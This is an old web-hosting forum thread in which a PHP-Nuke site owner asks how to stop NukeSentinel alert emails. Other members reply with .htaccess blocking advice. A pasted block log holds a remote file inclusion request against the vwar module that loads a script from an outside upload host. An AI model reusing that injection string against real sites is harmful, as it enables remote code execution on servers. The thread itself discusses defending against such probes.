Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x
Author Message
bugsTHoR
Involved
Involved


Joined: Apr 05, 2006
Posts: 261

PostPosted: Mon Dec 15, 2008 9:38 am Reply with quote

i keep geting a certain medical site blocked which is great for sentinel and me Smile

the thing is i noticed its port number would change and then it would try again which im not worried as sentinel is saving me the work lol

but how do i stop my hotmail inbox geting spammed by the notices

ie: block the hack bot or whatever it is perminently using the IP and port.

or would it be easier for me to install the killer templates to kill there server lol

_________________
Only registered users can see links on this board! Get registered or login! LUV RAVEN DISTROBUTION BEBE

Clanthemes.com are great (free advertisements for now until i get to 20,000 posts LoL) 
View user's profile Send private message Visit poster's website
bugsTHoR
PostPosted: Mon Dec 15, 2008 9:39 am Reply with quote

this is the last one they used on me

Created By: NukeSentinel(tm) 2.6.01
Date & Time: 2008-12-14 16:42:09 GMT GMT +0000
Blocked IP: 64.18.142.194
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
Referer: none
User Agent: Mozilla/5.0
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=vwar&file=war //modules/vwar/admin/admin.php?vwar_root=http://uploader.ws/upload/200812/FX29ID1.txt??
Get String: name=vwar&file=war //modules/vwar/admin/admin.php?vwar_root=http://uploader.ws/upload/200812/FX29ID1.txt??
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 64.18.142.194
Remote Port: 43622
Request Method: GET
 
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Mon Dec 15, 2008 12:09 pm Reply with quote

Has the IP been added to the .htaccess file?

As long as the IP is blocked and doesn't change it should then be blocked by the server and not trigger Sentinel.
 
View user's profile Send private message
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Mon Dec 15, 2008 11:06 pm Reply with quote

Note that these are standard automated attempts to hack your site. Botnets don't care if you have defense or not, or even if you are using the vulnerable script. They will attempt and move on. Things like the PC killer script won't generally work because they load nothing into a browser... they just point, shoot, and move on.

There are ways to block generic remote file injection attacks at the server level, but generally all sites have to live with it. There isn't anything you can do but keep your scripts up-to-date and secure.

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Tue Dec 16, 2008 11:12 pm Reply with quote

This in .htaccess should stop these hack attempts prior Sentinel and thus stop e-mails:

RewriteEngine On


RewriteCond %{THE_REQUEST} .*http:\/\/.* [OR]
RewriteCond %{THE_REQUEST} .*http%3A%2F%2F.*
RewriteRule ^.* - [F]
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©